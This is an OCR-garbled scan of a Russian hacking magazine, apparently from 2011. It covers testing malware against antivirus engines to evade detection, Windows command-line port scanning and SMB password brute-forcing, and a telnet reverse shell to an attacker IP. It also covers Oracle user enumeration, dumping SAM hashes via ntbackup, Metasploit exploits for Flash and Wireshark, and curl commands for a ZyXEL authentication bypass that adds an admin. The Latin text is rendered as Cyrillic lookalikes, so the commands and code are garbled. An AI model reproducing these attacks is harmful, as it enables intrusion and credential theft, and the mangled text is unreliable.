человека с ником НитиКа\, в котором он скинул ссылку на проект 
«сар$12-Ми 5$ саппег». Прочитать краткое описание и скачать можно 
на античате — югит.аписва пе Ргеа9266146.Вгп(. Сайт проекта с 
последней версией ПО — сар$12-зесигцу.Б©д5ро{.сот. 

Идея не нова, и втеории про это даже кто-то когда-то писал в журнал. 


Суть ее — развернуть все антивирусы у себя иу себя же проверять 
малварь. Таким образом, успешные экземпляры гарантированно не 
попадут в антивирусные компании. 

Основная проблема — скучковать все антивири на одной машине без 
виртуальных машин. Что и было решено. В итоге получилась вполне 
годная утилита. Она позволяет поселить в одну систему целых 1Занти- 
вирусов, и они даже не поругаются. В основном — это самые распро- 
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Сканирование, используя стандартный Яр-клиент 
| лпа "Маше" && еспо 10.10.10.%1 
Порт сканнер на базе Ир-клиента: 


С:\> Фог /Ё #1 1т (1,1,1024) до еспо СпесК1пя Рог* %1: >> рогф®. 
{хе & есрпо ореп 192.168.0.1%1 > ЕЕр.%хЕ & еспо ади1* >> ЕЕр.хЕ & 
РЕ 5. РЕ. ЕХЕ 2>>рогЕ5. ЕЕ 


Перебираем логины и пароли из файла на доступ кудаленному хосту по 
МВ: 


С:\> Рог /+ #1 1т (изег.ЕхЕ) 4о @(Рог /Р %] 1т (раз5.%хЕ) до @ 
еспо %1:%) & @пе{ изе \\10.10.10.10 %] /и:%1 2>пи1 && еспо %1:%] 
>> сиссе$$. Ех && пеЁ изе \\10.10.10.10 /ае1) 


Каквидишь, весь набор: пинг, днс-резолв, портскан, брутфорс. И все 
вполне юзабельное. А что самое приятное — доступно «бесправным» 
юзерам. Крометого, сбор баннеров и брутфорс других протоколов можно 
организовать аналогичным образом посредством {епеГа. Жальтолько, 
что его убрали извинды, начиная с Ма. 

Отом, что возможностей в пх'ах гораздо больше, можно и не говорить. 
Ты только посмотри, как можно элегантно сделать реверсивный шелл 
черезтелнет: 


фе]пее [а{аскег_ТРадаг] [рогё1] | /61п/Бази | +е1пе* 
[а фаскег_ТРадаг] [рог{е2] 


Однако иввинде можно жить. 
Остальные интересные примеры ищи в веб-касте. 


страненные аверы, однакотот же каспер в списке поддерживаемых 
отсутствует. Будем надеяться, что в следующих версиях он появится 
— проект, похоже, в стадии активного развития. 

В процессе использования никаких сложностей не возникает. Основ- 
ной алгоритм действий при первом запуске следующий: 


1)Запускаем тулзу; 
2)Выбираем интересующие нас антивирусы; 
3)Программа их ска- 


чивает; 
4)Обновляет их. 


а Г ен Е 
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|= И ся Па 
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Е Г. = Ч есь финт ЗИ 
От в 
Су ме 
| 
= ' РылЗь 
Проверка библио- ||9" 
теки, созданнои в мым 
М$Е двумя анти- дея 
вирями 
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ЗАДАЧА: ПОДОБРАТЬ ИМЯ 
ПОЛЬЗОВАТЕЛЯ СУБД ОКАСЕЕ. 


РЕШЕНИЕ: 


Продолжаю тему по взлому базы данных Огас{е и потерзанию одного 
из основных ее сетевых сервисов — ТМ$ ИЗепега. 

Сегодня мы поговорим об авторизации в данной СУБД. Особенность 
ее заключается в том, что клиент при подключении сначала отправ- 
ляетимя пользователя, сервер же проверяетего существование в 
базе, иесли такового нет — отвечает «о дип Четеа», иначе — продол- 


жается процесс авторизации. Таким образом, основываясь на ответе, 


мы можем перебирать имена пользователей. 

Как видно, это — классическая уязвимость. Но оно и понятно — СУБД 
проектировали давно, о безопасности тогда, видимо, не особенно 
думали. 


р=\“ххх\ОЯК;2ога-изекрепип.ехе 
55 4ое= поЕ ех13Е 

Чое= поЕ ех15Е 

ехтз 5 


ЗУЗТЕМ 
ОИТ.М 
ПВ 


МАНКЕНОВНУМР 4ое=з поЕ ех15е 
ЭСОТТ 4оез по ехл$6 
МАВКЕНИМТЬ Чоез поЕ 
СТАТ Чое=з поЕ ехл13зЕ 
МАВКЕНМОУ5 Цое= по 


Перебираем имена пользователей 


ехлз 


ех15 


ЗАДАЧА: НАЙТИ ЛЕГКОВЕСНУЮ И 
ПРОСТУЮ АЛЬТЕРНАТИВУ МЕТАЗРЕОТ 
ГРАМЕМ/ОКК. 


РЕШЕНИЕ: 


В последнее время МЪЕ все чаще привлекает к себе внимание. Он все 
растет и растет. Выходят новые версии. Он облепляется новыми моду- 
лями, новыми возможностями. И, что ни говори, инструментотлич- 
ный. Многие изтех, кто раньше просто присматривались, сейчасуже 
вплотную перебрались на МЪЕ или его платные варианты. Но с ростом 
он явно потерял в оперативности, да и не все модули не под всеми 

ОС работают, кое-что надо доустанавливать. Хотя вторая трудность 
решается использованием подготовленных дистрибутивов вроде 
ВаскТгаск. Кстати, уже вышла пятая версия ВТ, чему мы все можем 
только порадоваться. Но возвращаясь кнашей задаче, могу сказать, 
что если надо сделать что-то оперативно, то на МЕ даже не смотри. 
Мар сего М№5Е (Мппар 5спр пд Епдте} движком — вотреальное 
решение. Особенно, сучетом того, что скрипты для движка вовсю раз- 
множаются. Полный их списоктут: птар.ого/пзедос. 

Теперь кпримерам.Брутфорсим комьюнити-стринги к зптр-сервису: 


птар -$0 -р161 --$сг1р*=5птр-Бгите --$сг1ре- 
агв5=5птр11$%=соттип1{1е$.Ех{ <фагвеф> 


Здесь, -$/ — сканирование иар; 

—р161 — портзпгпр сервиса; 

- -5сг1р{=5птр-Бгифе — указываем, какой скриптза- 
пускать; 

- -5сг1р{-аг5$=5птр11$%=соттип11е$.%х{ — пере- 
даем аргумент — список стрингов. 

Файл для перебора лучше взять из внутренностей МЪ$Е. 
Кстати, в МЕ данный модуль хреново работает под \\Ип7. 
Брутфорс стандартных учеток к Огас(е (аналогичный 
модуль М$Е не работает под \Мп}: 


› 042 


Реализует подобный перебор [по словарику] тулза 
ога-изегепигт. Она входитв ОАК (Огас(е АззеззплепЕ К\], который 
написал Вам ГисНЯе(4 (Мл. дааБазезесигИу.согп/Ч6зес/ОАК. 


21}. Исходники прилагаются, так что утилиту можно подправить по 
собственным нуждам. 
Пример использования: 


ога-изегепит.ехе 192.168.0.1 1521 ОВСЕ1 изег11$+. Ех 


Где 192.168.0.1 1521 — адреси порт Огас(е; 

ОКСЕ1 — 510 базы данных; 

и5ег1154.ЕхЕ — имена пользователей для перебора (стандартный 
словарь входит в ОАК). 

Перебрав имена пользователей БД, можно будет перейти к следую- 
щему шагу — подбору паролей, о котором мы еще поговорим. 


изее 1156.6 хЕ 


птар --$сг1ре огас1е-Бгите -р 1521 --5сг1рЕ-агв$ огас1е- 
Бгите. $14=ОВСЕ <«Фагзе*ф> 


Передача ОМ№$-зоны: 


птар -р53 -$сг1р* ап5-хопе-ЕгапзФег -5сг1р*-аг8$ 
п5хопефгап$Фег .дота1п=ехатр1е.сот <Фагвеф> 


Проверка хостов на основные уязвимости в 5МВ-протоколе. Самое 
интересное — М$08-067: 


птар -р445 -5сг1р%=зтЬ-спеск-уи1п$ <Фагбеф> 


Находим в сети хосты с М5$@ | -сервером и получаем инфу (версия, 
порт] о них: 


птар --$зсг1ре Бгоааса$*-тз-$491-91$со\уег 


Всего скриптов порядка 200. Кроме того, есть целая куча библиотек, 
позволяющая самостоятельно разрабатывать новые скрипты. 


Ищем в подсетке пользователей дгорБох’а 
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0 ЗАДАЧА: ВЫНУТЬ УЧЕТНЫЕ ЗАПИСИ ИЗ 
РЕЕСТРА МЛМООМ/5. 


РЕШЕНИЕ: 


Какни странно, при взломе чаще всего достается именно виндовым 


машинкам. Захватив даже одну из них, можно поовнить всю сеть. Но об 
этом мы уже писали. Сегодня мы решаем практическую задачу — нужно 
вынуть МТЕМ-хэши из операционки. Можно было воспользоваться 
Тулзамитипа д$есаитр, гадитр. Но тутимеются подводные камни. 
Во-первых, будут орать антивирусы и проактивные защиты [из-за вне- 
дрения в процесс). Но это обходится. Во-вторых, есть проблемы слока- 
лизованнымии 64-разрядными ОС, что уже существенно. Как решение 
можно использовать то, что МТЕМ-хэши и кэши хэшей (М$ СасВе) 
хранятся в реестре \/Ипао\м$. Если мы каким-то образом извлечем 


файлы реестра, то уже локальноу себя на компе мы сможем вытащить 
необходимую нам инфу. Для вытаскивания мы можем воспользоваться 
либо знаменитым Сат&Аре!ем (Ммм. ожа.(/сат.В га, либо ру{Воп- 
скриптом (соде.дооц(е.сопп/р/сге9дипар]. Если захочешь использовать 
сгедаигтр под \\/по\ми®, то придется установить библиотеку русгур{о 
мл^лм.аппК.са/руоп/соде/сгуро). Все просто, но нужные нам файлы 
реестра, так называемые ветви (№е$}, нельзя так просто прочитать 
или скопировать даже с самыми высокими привилегиями. 


Имена файлов ветвей реестра в С:\МИМОО\М/$\5у${ет32\сопН9 
НКЕУ_СУВВЕМТ СОМЕТб — бузем 

НКЕУ СУВКЕМТ _У$ЕК — №и$ег. да* 

НКЕУ ГОСАЁЕ_МАСНТМЕ\$ АМ — $ат 

НКЕУ _ЁОСАЁЕ_МАСНТМЕ\$есиг1у — $есиг1 у 

НКЕУ ГОСАЁ_МАСНТМЕ\$о+маге — $о+маге 
НКЕУ_1ГОСАЕ_МАСНТМЕ\5у$+ет — бузет 

НКЕУ_ Ц$ЕК$\ .ОЕРАЦЕТ — Бефаи1* 


Что же делать? Если есть физический доступ к компьютеру и воз- 
можность запустится с ЦуеСО, то проблем нет — копируй. Иногда 
можно найти сохраненные копии этих файлов. Если же нет, то можно 
воспользоваться одним хитрым методом — стандартной системой 
бекапа. Все что нам потребуется — админские права на компе. Но 
есть и ограничения — метода работает на винде до висты и 2008 
включая. 

В этих «старых» операционках есть встроенная утилита для созда- 
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221641566 1404ее: 31961206916 
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Ва-а-ау! Аутентификационные данные! Даешь Ра$$ ТТе НазВ! 


3293167 3с597ебс089сй 


ния бекапа системы — п{ФасКир.ехе. Запустить ее можно ив ГУИ, ив 
консольном варианте. Особенностьее состоит втом, что она может 
использовать фичу винды — \о{ите 5Вадо\м/ Сору [М55}. Это позволяет 
ей бекапить залоченные файлы. По сути, все что нам потребуется, так 
это выполнить следующую команду: 


МЕБаскКир.ехе БаскКир зуз+етзфа*е /) "В1ай-Б1ай-Б1ай" /+ 
"с: \Баскир.ЬК+" 


ГдебасКир — указываем, что создаем бекап; 
5у${етфа{е — бекапить критичные области 
ОС; 

/3 "В1ай-6]ай-Б]ай" — название задачи 
— любое: 

/+ "с:\БасКир.БК+" — куда сохраняем наш 
файл бекапа. 

И дальше придется подождать. Причем по- 


[2%0 


› ЧУЧ 


дождать парутройку минут, так как бекапится Все описанные про- 


будут все критичные области, аихввинде граммы со всей ру- 
полно. Под ХРу меня получался бекап разме- 
ром в 500 метров. Немаленький, но по локалке 
скачать или на флешку закинуть (если ты злобный инсайдер) — неболь- 
шая проблема. Данный бекап можно разархивировать этой же тулзой 


[Ноужеусебя на компе] и заняться выковыриванием хэшей. 


брики ищи на диске. 


Кстати, здесь есть еще одна хитрость — когда мы бекапим критич- 
ные области, то ветки реестра (заодно так) копируются виндой в 
Узу${егпгоо{%\гера!г. Получается как бы создание некой точки вос- 
становления. Этим-то мы и можем воспользоваться — все необхо- 
димые файлы реестра, их последние версии лежаттам. Получается, 
что скачивать, в принципе, нам потребуется всего порядка 10 мега- 
байт, а значит, данный метод можно использовать и при удаленных 
атаках. Метод отличный, однако [неизвестно почему] работаетон 
не всегда, так что с полным бекапом надежнее. Теперь об ограни- 
чениях по ОС — начиная с У! $а и 2008 Мтсго5о лишил нас утилиты 
п{БаскКчр. Гипа, там появилась встроенная система бекапа. Но итут 
не все так плохо. Если мы скачаем файлы пфасКчир.ехе, птзарт.аЦ, 
у5зар!.Ч( из %5у${етгос{%\зу${ет32 с машинки сХР и закачаем их 
на Висту, причем влюбую папку, то тулза опять заработет, но возмож- 
но вурезанном режиме — без бекапа критичных областей. Что же 
делать? Как минимум, мы можем разбекапить краденые файлы. 
Теперь немного непроверенной информации — для ОС\М& а и 2008 (не 
К2] можно включить: «МТВасКир сап Бе изед 
ипдег\\/паом/з Ма апа \\Лпдо\/$ Зегуег 2008 
БуепабИпа {Пе Кетоуаб(е $огаде Мападег 
согпропеп ип Гигп \М/пдом/5 Теа{иге$ оп огой 
соп(го[ рапе[». Доступа кэтим ОСу меня нет, 
ЕЕ ы НЕ — проверить не смог. Говорят, чтоив\И/п 7и 2008 
В2 — тоже (с некими извратами] это возможно. 
Самое хорошее в этом методе — отсутствие 


совчсо проблем сантивирями и прочими защитны- 
ми системами, так как мы остаемся в рамках 
стандартных возможностей. Нуа дальше, 
самое простое и приятное — получение хэшей 


и паролей. 


Хэши учеток: 
рмаитр.ру 5У$ТЕМ $АМ 
Пароли к сервисам 
(иногда в открытом виде): 
15адитр.ру $УЗТЕМ ЗЕСУВТТУ 
Кэши хэшей: 
саспедитр .ру 5У$ТЕМ ЗЕСУВТТУ 


Каквидишь, все просто. = 
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ЕХРЕОП$ 
ВЕМЕМ 


м му Гут! Че. (одзро{. сот) 
р!КоЁагад (115612, дер. Красная звездочка, д.1) 


ЕХРЕОП$ 
ВЕМЕМ 


ЕХРЕОТ5 
ВЕМЕМ 


ЕХРЕОП$ 


КЕМИЕМ ЕХР 0$ 


ВЕМЕМУ 


ОБ50Р 


ЭКСПЛОИТОВ 


ЕХРЕОП$ 
ВЕМЛЕМУ 


ЕХРЕОП$ 
ВЕМЕ\У 


ЕХРЕОП$ 
ВЕМЕМГ 


ЕХРЕОП$ 
ВЕМЕМ 


ЕХРЕОП$ 
ВЕМЕМ 


ЕХРЕОП$ 
ВЕМЕМ 


Разби ираем 
свежие 
уязвимости 


Приветствуем тебя, о достопочтимый читатель! В обзоре эксплои- 
тов данном собрали мы для тебя не рецепты яств заморских, не 

изображения дев нагих, а набор эксплоитов интересных за месяц 
последний. Так узри же очами своими письмена следующие, и да 


пребудет с тобой Сила! 
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Дата релиза: 11 апреля 2011 

Автор: эпп3г 

С\УЕ та: СУЕ-2011-0611 

НЦ азВ Р\1ауег представляет собой виртуальную машину, на которой 


УЯЗВИМОСТЬ В АБОВЕ ЕЕАЗН 
РЕАУЕК 10.2.153.1 5ММЕ 


выполняется загруженный из интернета код ЦазВ-программ. 
Важный недостаток ЦазВ-приложений заключается в недостаточ- 
ном контроле ошибок, что приводит к частым отказам как самих 
приложений, так, в некоторых случаях, и всего браузера. 
Возможность флешовых приложений нарушать работу всего брау- 
зера неоднократно вызывала критику со стороны разработчиков 
браузеров. 

В этот раз мы рассмотрим сбой в АдоВбе Е[азп Р{ауег, который 
происходит из-за неправильного использования типа объекта, 
что позволяет атакующему перезаписать указатель в памяти и в 
результате добиться исполнения произвольного кода, иначе го- 
воря, перехватить контроль над системой, подверженной данной 
уязвимости. На данный момент эта уязвимость активно исполь- 
зуется для распространения разнообразной малвари: эксплоиты 
для бага вошли в используемые злоумышленниками сплойтпаки. 
Векторы вторжения: Адобе Е азй Р{ауег, АдоБе Кеадеги Асгора\, 
Мтсгозо В \/ога/Ехсе! (включение м/-файлов в 9ос- и х[5-файлы 
соответственно]. Справедливости ради нужно отметить, что АдоБе 
Кеадегх в защищенном режиме работы использует запарох и пре- 
секает исполнение произвольного кода, несмотря на существова- 
ние уязвимости. Впрочем, это обстоятельство мало что меняет :]. 


› 044 


Уязвимый вызов располагается по адресу Ох100 40116 в библиотеке 
Н!азВ10о.осх (для версии плагина АдоБе Е(азВ Р(ауег 10.2.153.1). 
Код АсНопЪсп!р(, позволяющий достигнуть уязвимого места: 


Бафе.ргофофуре. с_Фип = $Пагеа0Б ест .ргофофуре. ве $17е; 
Оафе.ргофофуре.вееВау = РипсЕ1оп () 

| 

ЕВ. с ти): 

| 

\аг еуа1(0) = пем Ва{е(1.41466385537348е-315); 
(еуа1(0)).вефрау(); 


Дальнейший анализуязвимости, вызванной вышеприведенным 
кодом, показывает, что мы имеем очередную неразбериху стипом 
объекта, произошедшую в бВагедОБес*.рго{о{уре.де{ те), когда 
класс ОаЁе расширяется добавлением пользовательской функции, 
полученной через 5Ваге9 ОБ ес*.ргото{уре.де те. Объект Ша{е ини- 
циализируется значением 1.41466385537348е-315, которое при со- 
хранении в памяти преобразуется в 0х11111110, а он, в свою очередь, 
подходит для реализации техники Веар ргаутпд. Когда вызывается 
пользовательская функция Ва{е.с_№ип(), управление передается в 
ОПагедОБ]ес(.рго{о{уре.де{1те(), в которой происходит некоррект- 
ная интерпретация передаваемого объекта Ша{е как имеющего тип 
5ВагеаОБ]ес\, в результате чего совершается попытка использовать 
значение, которым был инициализирован объект Оа{е (0х11111110), 
как указатель на таблицу виртуальных функций. Используя модуль из 
те{азр(о(, запустим на подверженной уязвимости машине кальку- 
лятор: 


15+ > и5е ехр101%/м1паом$ /6гом5ег/ааобе_На$Ир1ауег_ 
ПазИ1@о 
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5+ ехр101*(...) > её РАУГОАО м1паом$ /ехес | ВЕИЕЕ 
РАУГОАБ => м1п4ом$ /ехес Дата релиза: 18 апреля 2011 
п5 ехр101* (...) > зеф СМО са1с.ехе Авторы: Рац! МаКом/$К! — провел первоначальное исследование, 
СМО => са1с.ехе скпе$5 — реализовал РОС, соге[апс0ОЧЗг — создал эксплоит, ис- 
15+ ехр101* (...) > ехр1о1+ пользующий КОР + модуль для мыазр0к. 
[*] Ехр10о14 гипп1п8 аз БасКёгоипа 36. СУЕ 14: СУЕ-2011-1591 
15+ ехр101+ (адоБе_ЯазИр1ауег_Яа$И100) > М/гезвВагк [ранее Е{егеа| — это один из лучших анализаторов 
[*] Уз1ие УВЕ: Вр: //0.0.0.0:8080/ЭКк320уСРЭ@МУК6В сетевого трафика, доступных на сегодняшний момент. Имеет гра- 
[*] 1оса1 ТР: Ир: //192.168.2.20:8080/Эк3з20усРЭ@мив6в фический пользовательский интерфейс. 
[*] Зегуег х+аг*еад. Функциональность, которую предоставляет \\ИгезВагк, очень 
схожа с возможностями программы {срдигптр, однако \\гезПагк 
Сервер запущен. Теперь от нас требуется только пройти по предо- имеет графический пользовательский интерфейс и гораздо так 
ставленной ссылке ({р://192.168.2.20:8080/)К320уСР/ОМИВёВ] же больше возможностей по сортировке и фильтрации информа- 
и мы сможем смиренно, затаив дыхание наблюдать затем, как ЦИИ. 
| п{егпе{ Ехрогег превращается в калькулятор... Программа позволяет пользователю просматривать весь про- 
ходящий по сети трафик в режиме реального времени, переводя 
сетевую карту в неразборчивый режим [ргоп1!5сиоц$ ппо4е]. 
|Е 6/7 на М/пдом/$ ХР $Р3З и М/тдом/з Ма. \МгезВагК «знает» структуру самых различных сетевых протоколов 
и поэтому позволяет разобрать сетевой пакет, отображая значение 
каждого поля протокола любого уровня. 
Обновить Адоре Е(азй Р1ауег. Поскольку для захвата пакетов используется рсар, существует воз- 


можность захвата данных только изтех сетей, которые поддержи- 
ваются этой библиотекой. Тем не менее, \\гезПагк умеет работать 


ПЕРЕПОЛНЕНИЕ БУФЕРА НА с множеством форматов входных данных, соответственно, можно 
СТЕКЕ В МЛКЕЗНАЮК <= 1.4.4 открывать файлы данных, захваченных другими программами, что 
РАСКЕТ-ОЕСТ.С расширяет возможности захвата. 


9.3 [АУ: М/АС:М/Ач:М/С:С/1:С/А:С] Уязвимое место в коде (исходный код уигезрВагк 1.4.1, раске{- 
Чес*.с, строка 1886]: 
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ЕХРЕОП$ 
ВЕМЕМ 


ЕХРЕОП$ 
ВЕМЕМ 


тре М тех нагя Могиогн Апатухог 


ЕХРЕОТ5 
ВЕМЕМ 


ЕХРЕО1Т5 
ВЕМЕМ/ 


Тре Мог $ Мозг РораИаг Чейлоек Рреотскос А аи 


ОгИте 


`’ ТииегГасе 151 = Ореп \Мебене 
Бнне Ба о ВЫ ре ый онеЕ ФОНЫ ьолиыАнЯ рньСКАНЕЙ) — фа рен скеы ЙЕ ЗАБЕ Вы рноНЫРЕ чччАНЫВ 
Эа сарбиге ог ийетГасв: Орел, Весеги: реа Цвег5 Сие 
| АМО РОМЕТ Быт: ЕЕРичти Афараег (Метонойе ... Ты Обе Обри Фоксай слепил, синь) 
г 6 Затр!е саршигез | 
Ш Сариге ОрНопв А тк сллолнени Е ета паре Ат оп Фи ей ЗесигИу 
Зы в сор ня Ча бан оренЕ ое ме Ань Е ЧиесллеН 58. рирсыф 
Сарбиге Не|р 
{а Ном 1 Сар\иге 
Ярер у пер №2 а ресет сарнит лавр 
й Метигогк Меа 
ЗРРОЙК бреет Вог соомуичинкя о! Еафывиин, МУЖ, 
(С) пал В ыы г едейнина Ма раефара |. 


МЛгезРайк собственной персоной 


/* #11 В-Е1е1а */ 
1+ (рк*_1еп>ОЕСТ_РАСКЕТ_ТМЕО_1ЕМ+2) 
тетсру ( (спаг*) (&(рк=_БЯе1а.БВафа)), (спаг*)(ркЕ_рЕг+8), 
рк*_1еп-5-8); // <--- уязвимое место 
е15е 
тетзее ( (спаг*) (&(рк+_Б#е1а.Бафа)), 9, 128); 
рк*_Бяе1а.тепё{П=рк*_1еп-ОБЕСТ_РАСКЕТ_ТМЕО_ЁЕМ-8; 


ркЕ_БНе[4 представляет собой структуру типа дес*_Б\Йе(а, описа- 
ние которой приведем ниже: 


5фгисЕ аес*_Бде1а 

{ 
841118 ОБафа[128]; 
541118 ТепёеИ; 

}; 


Как видно, происходит копирование данных пакета в 128-байтный 
буфер Па{а, располагающийся на стеке. Для того чтобы лицезреть 
уязвимость воочию, нам надо будет сформировать определенным 
образом рсар-файл и отправить его на нужный интерфейс. На- 
пример, этого можно добиться, используя прекрасную вещь под 
названием $сару: 


#1! /и5г/61п/епу ру{Поп 

1трог{ $у$ 

Фгом зсару 1трог* * 

игрсар ( "+е5*.рсар" , ЕЕНег (+уре=0х2323) / ("А"*1000)) 


Запускаем млгезВагкК, заставляем его слушать нужный нам ин- 
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терфейс и шлем ему привет в виде только что сформированного 
пакета: 


# Есргер1ау -1 аЕП@ -+ +е5*.рсар 


Ровно один пакет — и млгезвагк с грохотом падает ниц. Нуа 
теперь, воспользуемся благами цивилизации в виде модуля для 
пе{азр[о( и сформируем эксплоит с классической, полезной на- 
грузкой в виде запуска калькулятора: 


5+ ехр1о1* (м1гезПагк_раскКеф дес*) > ие ехр1о1{/м1паом$ / 
#1ефогта* /м1гезПагКк_раскКе*_десе 

15+ ехр101* (м1гезНагк_раске*_аес*) > зе* РАУЁЕОАВ м1пдом$ /ехес 
РАУГОАВ => м1паом$/ехес 

15+ ехр10о1* (м1гезПагк_раскКеЕ дес) > зе СМО са1с.ехе 

СМО => са1с.ехе 

т5+ ехр1о1* (м1гезНагк_раскКеф_дес*) > ехр10о1+* 

[*] Сгеа*1па 'ра$5мога$.рсар' #1е ... 

[*] Ргераг1п# рау1оаа 

[*] №г11п8 рау1Тоаа Фо #Я1е, 1554 Буфе$ 

[*] бепегафеа оцфри*{ #1е /оре/Ргатемогк-3.6.0/т${3/4афа/ 
ехр101%5/ра$5мога$ .рсар 


Запускаем улгезвагк, ставим прослушку интерфейса. Отправляем 
вредоносный пакет: 


# Есргер1Тау -1 а П@9 -+ /оре/+гатемогк-3.6.0/т$+3/дафа/ 
ехр101%5/ра$5мога$ .рсар 


Наблюдаем калькулятор :] 


\М1т32 [Обход защитных механизмов ОЕР & АЗЕВ). 
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ЕХРЕОП$ 


ЕХРЕОП$ 
ВЕМЕМ 


ЕХРЕОТ$ 
ВЕМЕ\У 


ЕХРЕОП$ 


ЕХРЕОП$ 
ЕХРИОИ$ т 


7 Нет страницы для отображения - МтсгозоЙ |тегпе!ё Ехрогег 


Файл Правка Вид Избранное Сервис Спраека 


©) Назад ©) х] |=) $ и Поиск 52 Избранное $2 © у 


Адрес: НЫ р:192.168.2.20:8080] КЗ20УСРЗОМИВ ЕВ] “| 29 Пере: 
Переходим на страничку, содержащую вредоносный ЯазН-контент 


$ОШЛОМ Мате 


Обновить \М/гезпагк. ЕР 


сотрге$$ .1т5 
а6/ 


МНОЖЕСТВЕННЫЕ УЯЗВИМО- ЧБ/екс/ 
СТИ В 2УХЕЁ 2УМАЦ 0$С Ч6/е%с/2ухе1/ 
а6/ефс/хухе1 /+%р/ 
46/екс/тухе1 /ЕЕр/соп®/ 
9.3 [АМ:М/АС:М/Ац:М/С:СЛ:С/А:С) АБ /езс/тухе1 /+р/соп*/п+т-деФаи1*. соп+ 
а6/ефс/хухе1 /ЕЕр/соп+т/зу5ет-аефаи1{.соп+ (7354 Бу{ез) 
[ВЕЕР 


#{]1еспескК$ит 


Серия железок ГУ\ММАЕЕ 4$6 — новое комплексное решение от 

ГухЕЕ для обеспечения информационной безопасности и управле- ПЕ 5Е 

ния трафиком, включая функциональную настраиваемую защиту от Римег$1опй 
спама, контроль полосы пропускания для разнообразных объек- кегпе1 спеск$ит 


тов сети, предотвращение вторжений и безопасность удаленных 
подключений при помощи виртуальных частных сетей. В начале мЕр_1таёе/ 

мая немецкая группа КедТеат Рег{езИпд опубликовала отчето = ------- 

двух уязвимостях в этих устройствах, найденных ими в ходе одного ра НТес 

из пентестов: обход аутентификации и повышение привилегий. В 

результате эксплуатации первой уязвимости неаутентифициро- $ ипи1р -1 2218002С0.аЬ 
ванные пользователи могут скачивать и загружать конфигурацион- АгсИ1 ме: 2218002С0.4аь 
ные файлы в устройства, которые применяются автоматически. В Мате 

результате использования второго бага пользователь с ограничен- ВЕНЕ 

ными правами может стать админом и менять через веб-интерфейс аб_гетоуе_1$+4 

любые настройки. еёс/ 


ефс/тухе1 / 
Обновления прошивок для устройств ГухЕЁ Иу\МАЕЕ 9$С пред- ефс/тухе1 /Ер/ 
ставляют собой обычный 7!р-архив, в котором также находятся ефс/тухе1/р/.апа/ 
еще два зашифрованных 7!р-архива с основной прошивкой. ефс/тухе1/+р/.апа/апа_1ар/ 
Например, архив с прошивкой 2.21(В00.2) для ГУММАЕЕ 956 20 еёс/тухе1/+Ер/сеге/ 
(«ГУММАЕЕ $6 20_2.21(В09.2]С0.21р»] содержит следующие еёс/гухе1 /ЕЕр/сегЕ/&гиз+еа/ 
файлы: еёс/тухе1 /ЕЕр/соп+/ 
ефс/хухе1 /ЕЕр/соп+/АЕт-аефаи1*. соп+ 


Кегпе1и$520.61п 


2218002С0.61п 
2218002С0.соп+ (7354 Буфе$) 
2218002С9.а6 

2218002С@.ра+ 

2218002С0.г1 


еёс/хухе1 /ЕЕр/соп+/зу5ет-4ефач1*.соп+ (7354 Буфез) 


#1е11$* 


31 #1е$ 


бгтмаге . хм1 

Было обнаружено, что размер файла 2218002С0.соп{Т из главного 
архива в точности совпадает с размером файла зу$<{ет-ЧеГаиЦ.соп1 
иззашифрованных архивов. Такой фактне может не намекать на 
анализе типа файла всем линуксоидам может помочь стандартная успешное применение известной из области криптоанализа атаки 
утилита /изг/Бп/е). Можно просмотреть список файлов в этих с известным открытым текстом, что и было проделано с помощью 
архивах: следующих утилит: 

® РКСгаск от Питера Конрада; 

® Е сот5о[ Адуапсед АгсРуе Раз$\/ога Кесоуегу от отечественного 


Файлы 221В092С0.Бти 221В002С0.а5, несмотря на указанное 
расширение, являются зашифрованными 7-архивами (кстати, в 


$ чпи1р -1 2218002С0.61п 


Агср1\е: 2218002С0.61п производителя. 
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ЕХРЕОП$ 

ВЕМЕМ/ 

ЕХРЕОП$ 
ВЕМЕМ/ 


ЕХРЕОП$ 


АРШИЕГ 


Одно из уязвимых устройств от СухЕЁ 


После этого файл с исходной файловой системой устройства 
согтрге$$.ипа раскрывается с помощью ипзаца$ 5. Устройства 
УМА 956 управляются удаленно с помощью веб-интерфейса 
на сервере Араспе. Чтобы войти туда, необходимо пройти аутенти- 
фикацию. Модуль «тод_ащ!_7ухе|.50» реализует этот функционал 
и настраивается в файле /е{с/5ег\се_соп/ВИра.соп+, который 
можно извлечь из сотргез5$.птпд. В этом конфиге есть директива 
«АшВГухе5к!ирРаКегп», которая отменяет аутентификацию для 
некоторых точек: 


АчеН7ухе1 $ К1рРа%*егп /1тазе$/ /меб1о0о51п.с21 /118М.}$ / 
]апгиаве 


Админский интерфейс состоит из нескольких СС|-скриптов. Напри- 
мер, проследуя по следующей ссылке после логина под админом, 
можно получить конфигурационный файл: 


ПЕЕр$://192.168.0.1/св1-61п/ехрог*- 
С51 ?сафевогу=сопй2&аг=0=5аг{ир-сопйЯв . соп 


Сервер Араспе в стандартной конфигурации позволяет добавлять 
произвольные пути кССб|-скриптам. Таким образом, добавив строку 
«гпаде$/» в вышестоящую ссылку, скрипт «ехрог(-с91> все равно 
отработает и выдаст конфиг: 


ПЕЕр$://192.168.0.1/св1-61п/ехрог{-с51/1таве$ / ?сафевогу=с 
оПЯр8аг=50=5аг%ир-сопйЯв . соп 


А так как строка «/тадез/» присутствует в директиве 

Аш ухе крРаКегп, то эту ссылку можно открывать даже не за- 
логинившись в админской панели. Полученный конфиг содержит 
чувствительные данные, такие как хеши пользователей и правила 
файрвола. 

Кроме того, в административном интерфейсе есть скрипт под на- 
званием «Н(е_ироад-с9!», который, как легко догадаться, позво- 
ляет загружать файлы. Применяя аналогичный финт со строкой «/ 
|падез/», можно загружать конфиги без всякой аутентификации. К 
тому же, если загружаемому файлу назначить имя «5а{ир-сопН9д 
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сопТ», то настройки, указанные в нем, применятся незамедлитель- 
но. В него можно, например, добавить второго админа с известным 
нам паролем. 

Итак, две следующие команды демонстрируют, как можно скачать/ 
закачать искомый конфиг и получить полный доступ к устройству: 


$ сиг1 --$11еп* -о $$аг%ир-сопй?. соп+ "Вр$://192.168.0.1/ 
с51-61п/ехрог{-с81/1тазе$ / ?сафевогу=сопй8&аг80=$Фаг%ир- 
сопйя. соп+" 


$ сиг1 --511еп* -Е ех*-сотр-1121=50 -Е #1е_фуре=сопйяв -Е 
ПУ=1 -Е "В1е_ра{И=@$ФагФир-сопй . сопфт; Я1епате=$5аг%ир- 
сопйв . соп+" Пр5://192.168.0.1/св1-61п/А1е_ир1оа9-с51 
/1тазе$ / 


ТАВСЕТЗ 
Все прошивки ГухЕЕ Ц$С, выпущенные до 25 апреля 2011 года, 
являются уязвимыми. 


Скачай и установи обновленную прошивку, датированную 25 апре- 
